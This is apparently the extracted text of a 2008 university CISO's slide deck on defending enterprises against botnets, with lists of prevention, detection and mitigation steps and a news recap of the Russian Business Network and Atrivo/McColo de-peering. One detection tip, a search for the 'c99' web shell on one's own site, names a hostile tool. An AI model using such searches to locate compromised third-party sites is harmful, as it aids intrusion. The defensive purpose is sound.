Departmental web pages
Traditional network vulnerability attacks
Protect Your Enterprise
AVOIDANCE
1. Establish a perimeter and segregate valuable or dangerous network segments. Make
FW rules accountable and require change control
PREVENT
1. Ensure that all enterprise and local accounts have strong passwords. Configure
Domain security policy to enforce this and auto-lockout
2. Eliminate all generic accounts. Where possible make all non-user accounts services.
3. Eliminate or encapsulate all unencrypted authentication
4. Establish standards for web app and other development to eliminate avoidable coding
vulnerabilities (e.g. use of mod-sec for apache websites)
5. Staff your anti-spam, anti-virus, abuse, proxy cache, and web filter processing efforts
6. Block outbound port 25 traffic except from your official mail servers
7. Block outbound DNS requests except for iterative requests made through the official
DNS servers (prevents spray and pray attacks)
Protect Your Enterprise
DETECT
1. Install and operate IDS/IPS systems (snort, etc)
2. Analyze network traffic for heuristic evidence of botlike behavior
3. Google your own site - site:mysite.com viagra
site:mysite.com c99
4. Centralize and process logs, including workstation security and firewall logs.
5. Mine your anti-virus quarantines, abuse notifications, infected systems for intelligence
about botnet infections. Feed this information to your event correlation system
6. Participate or join quasi-intelligence organizations
MITIGATE
1. Use intelligence data in your DNS server to block access to C&C sites and malware
distribution sites.
2. Use your centralized logs to detect and react to password guessing schemes in near real time.
3. Report detections to an incident response team that will quarantine compromised systems, determine physical location, and direct IT staff to retrieve the system, extract first responder data and intelligence, re-image the system, then return it to the system owner along with a report on the successful attack vector.
4. Include known malware distribution sites in your proxy server block lists
5. Establish a spearphishing hotline for quick response.
Protect Your Enterprise
REDUCE THE THREAT
1. Report new threats. Phishing attacks to Anti-Phishing Working Group. Botnet clients/C&C to isotf.org.
2. Feed the Bot related DNS attempts to your event correlation system
3. Add SiteAdvisor or IE7 anti-phishing feature to browsers
REDUCE THE VULNERABILITY
1. Actively scan your site for vulnerabilities (OS, network, web apps, etc)
NON-REALTIME ANALYSIS, DETECTION, and RECOVERY
1. Analyze data collected to identify new intelligence markers.
2. Evaluate new signatures, new tools, etc.
3. Use non-realtime data to develop strategies for ranking confidence related to
available data and intelligence.
4. Use Forensic techniques and sandbox technology to gather intelligence from known
compromised workstations.
RBN
RBN Operations
SILVERNET
CREDOLINK
RBN
OINVEST
SPB IX
DELTASYS
INFOBOX
DATAPOINT
11/21/07 Ref: Bizeul.org
RBN USA Dead?
It is pleasing to report the last remaining peer routing Atrivo
(AS 27595 Atrivo/ Intercage), ‘Pacific Internet Exchange’ (PIE)
see Spamhaus ref below, was withdrawn at 2:35am EST
Sunday Sept 21st 2008.
What Happened?
Company after company dropped relations with InterCage in the wake of multiple
reports documenting its shady dealings,
Suddenly UnitedLayer was the last firm willing to work with it. That essentially gave
Donaldson's people the power to send InterCage dark or, as he chose to do, stick
InterCage in a sandbox.
By Angela Gunn, BetaNews
September 25, 2008, 10:40 PM
http://www.betanews.com/article/UnitedLayer_COO_Giving_access_to_InterCage_is_an_issue_of_ethics/1222396858
McColo
Effect of De-peering
50% Drop in Spam
Who’s Next?
In the wake of the demise of Atrivo/Intercage and McColo, attention has focused
on other badware nets these entities formerly hosted.
EstDomains,
Esthost,
Hostfresh,
Cernel,
EstDomains was an Estonian network, led by Vladimir Tsastsin, that allegedly
once acted as the IP registrar for RBN domains. Malicious Web site hosting
nasties like CoolWebSearch and other spyware programs trace back to
EstDomains. Tsastsin has links to organized crime and also heads up Rove
Digital, a site also suspected of hosting malware servers.
Anti-spam group Spamhaus called EstDomain, Esthost, Cernel, and Hostfresh,
the "tentacles" of Atrivo/Intercage. Spamhaus cited these networks in August
2008 as backed by "gangs of cybercriminals" whose disappearance from the
Web would be difficult to achieve, but would result in a safer Internet.
Agenda
• Botnet Overview
• Botnet Schemes
• How Do They Get In?
• What Can We Do?
• Concluding Thoughts
Source of all evil
Q&A
Questions?
Craig A Schiller, CISSP-ISSMP, ISSAP
[email protected]
Portland State University
CISO